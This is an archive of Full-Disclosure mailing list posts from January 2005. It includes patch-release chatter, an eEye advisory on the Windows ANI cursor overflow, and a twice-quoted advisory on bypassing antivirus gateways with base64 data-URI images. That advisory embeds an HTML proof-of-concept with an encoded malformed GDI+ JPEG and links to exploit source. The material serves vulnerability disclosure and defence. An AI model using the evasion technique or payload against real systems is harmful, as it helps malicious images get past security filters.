It also doesn't work on non-Windows or with non-default colours.
Didn't work for Windows with default colours for me either; the real 
dialogue box jumped to the front. I am still on a nightly just before 
the 1.0 release though, and I believe it to be possible in theory. It 
could also, I think, be made to work without the 'browsing full screen' 
requirement.

Really - this is more a window management thing surely?  If someone fell 
for this, they'd deserve it to be honest.
It's window management, yeah, probably applicable to other browsers too, 
and not nearly as bad as the IE chromeless window stuff because you do 
get those extra couple of pixels of window edge to clue you in. But it's 
still not good.

The real solution is to force toolbar+menubar+addrtessbar on for all 
JavaScript pop-ups, at least as a default option setting. This would 
also fix the recently publicised problem with targeting other sites' 
pop-up windows for phishing.

--
Andrew Clover
mailto:[EMAIL PROTECTED]
http://www.doxdesk.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread devis 
Matt Ostiguy wrote:
On Sat, 8 Jan 2005 10:12:23 -0600, RandallM <[EMAIL PROTECTED]> wrote:
 

I don't think it's going to be free. While doing a small amount of research
on the "spyware community" I found this text string in the
GianttAntiSpywareUpdater.exe:
   

Doesn't the fact that the executable's name contains a company that no
longer exists (Giant) indicate that perhaps this BETA software will
undergo some changes before its full release as a Microsoft product?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 

Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
NOT cash on their own slack coding. Of course they will, now i suspect 
they even will try to make it go as an added cost for the OEMs, so 
consummers will pay transparently for one year signatures updates ... as 
they do/did for OSes.
Remember .. they never had a choice in the first place, why would they now ?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread James Patterson Wicks 
The updates are scheduled to come out today. 

>From Microsoft:
http://www.microsoft.com/technet/security/bulletin/advance.mspx


Microsoft Security Bulletin Advance Notification
On January 11, 2005, the Microsoft Security Response Center is
planning to release:

*
 3 Microsoft Security Bulletins affecting Microsoft Windows. The
greatest maximum severity rating for these security updates is
Critical. These security updates may require a restart.
 

No additional details about bulletin severities or
vulnerabilities will be made available until January 11, 2005.


If you have Windows in your environment, you should subscribe to the
advanced notification service.  Helps you plan for downtime.






-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Matt
Ostiguy
Sent: Tuesday, January 11, 2005 11:07 AM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]>
wrote:
> Where are they?
> Mike
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


This e-mail is the property of Oxygen Media, LLC.  It is intended only for the 
person or entity to which it is addressed and may contain information that is 
privileged, confidential, or otherwise protected from disclosure. Distribution 
or copying of this e-mail or the information contained herein by anyone other 
than the intended recipient is prohibited. If you have received this e-mail in 
error, please immediately notify us by sending an e-mail to [EMAIL PROTECTED] 
and destroy all electronic and paper copies of this e-mail.



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Micheal Espinola Jr 
Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST.  Myself being EST, I dont expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today.  You can
verify this on the web site.


On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]> wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France
> www.denyall.com
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


-- 
ME2

rss: 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Jeff Gillian 
Interesting. I tested a number of both Linux and Windows image
vulnerabilities that are all by default detected by my IronPort,
TippingPoint UnityOne and ISS Proventia appliances.

Using the technique you mentioned, they were ignored completely and delivered.
Additionally, there are appear to be several mail clients that support
that RFC, including Thunderbird so you can obviously target more than
just web browsers.

Jeff.


On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability
> January 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to
> bypass anti-virus
> (as well other security technologies such as IDS and IPS) inspection of
> HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding
> image content within
> the URL scheme. A remote attack may encode a malicious image within the
> body of an HTML
> formatted document to circumvent content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image
> that will attempt (and fail
> without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
> The image itself is detected
> by all AV gateway engines tested (Trend, Sophos and McAfee), however,
> when the same image
> is base64 encoded using the technique described in RFC 2397 (documented
> below), inspection
> is not performed and is delivered rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL
> scheme; Firefox, Safari,
> Mozilla and Opera do and will render the data and thus successfully
> execute the payload if the necessary
> OS and/or application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
>  src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAA
> AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEB
> AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
> Z">
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are
> and have been for several months.  If you have not yet applied them,
> you have your own
> negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
> platform testing.
> 
> Thank you,
> 
> Darren Bounds
> Intrusense, LLC.
> http://www.intrusense.com
> 
> - --
> Intrusense - Securing Business As Usual
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.2.4 (Darwin)
> 
> iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
> XT6MWYJOH3FmLfV3B1UfuJA=
> =82yy
> -END PGP SIGNATURE-
> 
> ___

[Full-Disclosure] EEYE: Windows ANI File Parsing Buffer Overflow

2005-01-11 Thread Derek Soeder 
Windows ANI File Parsing Buffer Overflow

Systems Affected:
Windows Me
Windows 2000
Windows XP (SP1 and earlier)
Windows 2003

Overview:
eEye Digital Security has discovered a vulnerability in USER32.DLL's
handling of Windows animated cursor (.ani) files that will allow a
remote attacker to reliably overwrite the stack with arbitrary data and
execute arbitrary code.

Because Windows animated cursors can be supplied for use by Internet
Explorer, this vulnerability affects any applications that use the
Internet Explorer component internally, such as Internet Explorer
itself, Word, Excel, PowerPoint, Outlook, Outlook Express, and so on, as
well as the Windows shell.

In the case of Internet Explorer, the user's system will be compromised
when the user views a website that shows a malformed ANI file referenced
via a style sheet in the HTML file. Likewise, a system may be
compromised through Outlook and Outlook Express when the user tries to
read an HTML e-mail containing a MIME-encoded malformed ANI file and a
style sheet referencing the encoded ANI file, invoked using HTML such as
< BODY style="CURSOR: url('cid:')" >. In the case of the Windows
shell (explorer.exe), exploitation occurs when the user opens a folder
containing a malformed ANI file.

This vulnerability also exists in all obsolete versions of the Windows
operating system (Windows 95/98/NT4).

Technical Details:
The buffer overflow bug exists in a part of USER32.DLL involved in
handling ANI animated cursor files. A partial ANI file format is given
below:

"RIFF" {(DWORD)Length_of_file}
"ACON"
"LIST" {(DWORD)Length_of_list}
"INFO"
"INAM" {(DWORD)Length_of_title} {szTitle}
"IART" {(DWORD)Length_of_author} {szAuthor}
"anih" {(DWORD)Length_of_AnimationHeader} {AnimationHeaderBlock}

Generally, the length of AnimationHeaderBlock shoule be 36 bytes
(0x0024). The vulnerability is in the handling of the
Length_of_AnimationHeader field. This value will be passed as the length
argument of memcpy(), in order to copy the contents of
AnimationHeaderBlock, but the value is not checked appropriately. The
buffer intended to hold the AnimationHeaderBlock is located on the
stack, so we can overwrite the return address and exception handler on
the stack and jump into the buffer containing our code.

This vulnerability is a separate vulnerability from the ones discovered
by Xfocus.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at: 
http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx

Credit:
Yuji Ukai

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/download.html

Greetings:
eEye Geneva and UK guys, Retina Japanese edition team, [EMAIL PROTECTED] (hey
watzup!!) , Manma Kanrakuzaka - Okinawa Cuisine (Tomato salad tastes
good)

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: I thought Microsoft were releasing new secu rity patches today (11 Jan 2005)?

2005-01-11 Thread Chris Brown 
Da Plane, Da Plane.

http://www.microsoft.com/security/bulletins/200501_windows.mspx


Tuffer

"I could fly like an eagle but weasels don't get sucked into jet engines"



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Handy, Mark (IT) 
These are now out as MS05-001/2/3 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Micheal
Espinola Jr
Sent: 11 January 2005 12:20
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST.  Myself being EST, I dont expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today.  You can verify
this on the web site.


On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]>
wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


--
ME2

rss: 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html 

 
NOTICE: If received in error, please destroy and notify sender.  Sender does 
not waive confidentiality or privilege, and use is prohibited. 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Danny 
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability
> January 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to
> bypass anti-virus
> (as well other security technologies such as IDS and IPS) inspection of
> HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding
> image content within
> the URL scheme. A remote attack may encode a malicious image within the
> body of an HTML
> formatted document to circumvent content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image
> that will attempt (and fail
> without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
> The image itself is detected
> by all AV gateway engines tested (Trend, Sophos and McAfee), however,
> when the same image
> is base64 encoded using the technique described in RFC 2397 (documented
> below), inspection
> is not performed and is delivered rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL
> scheme; Firefox, Safari,
> Mozilla and Opera do and will render the data and thus successfully
> execute the payload if the necessary
> OS and/or application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
>  src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAA
> AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEB
> AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
> Z">
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are
> and have been for several months.  If you have not yet applied them,
> you have your own
> negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
> platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch
it, but I am not sure about their gateway device. What was their
response?

...D
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] PoC to be released on 01/20/05

2005-01-11 Thread Exibar 



I'm goign to spend double what I usually spend that 
day, and maybe buy a big screen TV just to piss people like you 
off
 
  this is not the list for that crap, take it 
somewhere else...

  - Original Message - 
  From: 
  Some 
  User 
  To: full-disclosure@lists.netsys.com 
  
  Sent: Monday, January 10, 2005 9:13 
  PM
  Subject: [Full-Disclosure] PoC to be 
  released on 01/20/05
  
  
  This is a PoC by the people! Be sure to do your part. :-)
   
  Not One Damn Dime Day - Jan 20, 2005
  Since our religious leaders will not speak out against the war in 
  Iraq, since our political leaders don't have the moral courage to oppose it, 
  Inauguration Day, Thursday, January 20th, 2005 is "Not One Damn Dime Day" in 
  America.
   
  On "Not One Damn Dime Day" those who oppose what is happening in our name 
  in Iraq can speak up with a 24-hour national boycott of all forms of consumer 
  spending.
   
  During "Not One Damn Dime Day" please don't spend money. No one damn dime 
  for gasoline. Not one damn dime for necessities or for impulse purchases. Not 
  one damn dime for nothing for 24 hours.
   
  On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and 
  Target.
   
  Please don't go to the mall or the local convenience store. Please don't 
  buy any fast food (or any groceries at all for that matter).
   
  For 24 hours, please do what you can to shut the retail economy 
  down.
   
  The object is simple. Remind the people in power that the war in Iraq is 
  immoral and illegal; that they are responsible for starting it and that it is 
  their responsibility to stop it.
   
  "Not One Damn Dime Day" is to remind them, too, that they work for the 
  people of the United States of America, not for the international corporations 
  and K Street lobbyists who represent the corporations and funnel cash into 
  American politics.
   
  "Not One Damn Dime Day" is about supporting the troops. The politicians 
  put the troops in harm's way.
  Now 1,200 brave young Americans and (some estimate) 100,000 Iraqis have 
  died. The politicians owe our troops a plan - a way to come home.
   
  There's no rally to attend. No marching to do. No left or right wing 
  agenda to rant about. On "Not One Damn Dime Day" you take action by doing 
  nothing.
   
  You open your mouth by keeping your wallet closed.
   
  For 24 hours, nothing gets spent, not one damn dime, to remind our 
  religious leaders and our politicians of their moral responsibility to end the 
  war in Iraq and give America back to the people.
   
  ==> Please share this email. <==
  Original sent by:
  James WongMarsteller Interactive
  
  
  Do you Yahoo!?The all-new My Yahoo! – 
  What will yours do?
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread KF (lists) 
Ok folks the damn sky IS NOT falling.
I just checked my SUS install and I have 10 new updates...  so should you.
so lets all just FREAK [EMAIL PROTECTED]@#
-KF
Micheal Espinola Jr wrote:
Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST.  Myself being EST, I dont expect to see anything until
mid-afternoon.
MS did pre-announce that there would be a release today.  You can
verify this on the web site.
On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]> wrote:
 

On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
   

Where are they?
Mike
 

Thursday usually, not tuesday?
--
Vincent ARCHER
[EMAIL PROTECTED]
Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
   


 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread Dan Margolis 
On Tue, Jan 11, 2005 at 06:51:16PM +0100, devis wrote:
> Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
> NOT cash on their own slack coding.  

I'm confused. Are are you saying that "slack coding" by Microsoft is
responsible for spyware/adware? Seems a bit of an odd interpretation.
Here's mine:

- It's very, very difficult to prevent people from voluntarily
  installing spyware on their own systems. There's no way to write a
  heuristic that can distinguish between an application that accesses
  the 'net on a regular basis for spying and one that does so for, say,
  monitoring a buddy list or checking for mail. 

- You can certainly whitelist applications, but this would prevent
  useres from being able to install obscure shareware apps, custom apps,
  etc. 

- Were MS to restrict access to their API in order to prevent spyware
  makers from doing obscure tricks with the registry and whatnot, they'd
  be accused, quite rightly, of anti-competitive tactics. 

Certainly some spyware results from poor restriction of web controls or
something--I don't know the details, as I don't even use Windows--but
I'd bet you the vast majority comes from users installing stuff they
shouldn't--Kazaa, Snood, whatever--or from users clicking "OK" on banner
ads that promise to speed your Internet connection. 

Much of the same goes for e-mail worms: so long as a user has permission
to execute untrusted code and so long as that user has permission to
send code to other people, he is easy prey for e-mail born worms. 

So, here's the question: does most spyware exploit some actual bug or
design flaw? Or does it just use the user's gullibility? I suspect the
latter. 

Flame on. 
--
Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles 
No IE patch, it would seem.

> -Original Message-
> From: Eric Schultze [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, January 11, 2005 12:09 PM
> To: Patch Management Mailing List
> Subject: New Security Patches from Microsoft
> 
> Three new security bulletins have been released
> 
> 
> MS05-001 (Critical)Vulnerability in the Indexing Service 
> Could Allow Remote Code Execution (871250) Vulnerability in 
> HTML Help Could Allow Code Execution (890175) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> 
> MS05-002 (Critical)
> Vulnerability in Cursor and Icon Format Handling Could Allow 
> Remote Code Execution (891711) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> 
> MS05-003 (Important)
> Vulnerability in the Indexing Service Could Allow Remote Code 
> Execution
> (871250)
> http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx
> 
> 
> 
> Happy Testing
> 
> Eric
> 
> 
> ---
> To unsubscribe send a blank email to
> [EMAIL PROTECTED]
> 
> ---
> To unsubscribe send a blank email to 
> [EMAIL PROTECTED]
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Larry Seltzer 
>>No IE patch, it would seem.

No, but...

> MS05-001 (Critical)Vulnerability in the Indexing Service Could Allow 
> Remote Code Execution (871250) Vulnerability in HTML Help Could Allow 
> Code Execution (890175) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> 
> MS05-002 (Critical)
> Vulnerability in Cursor and Icon Format Handling Could Allow Remote 
> Code Execution (891711) 
> http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> 

Both of these address problems that have been exploited through IE.
These are the ones that have gotten so much recent publicity.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200501-22 ] poppassd_pam: Unauthorized password changing

2005-01-11 Thread Thierry Carrez 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
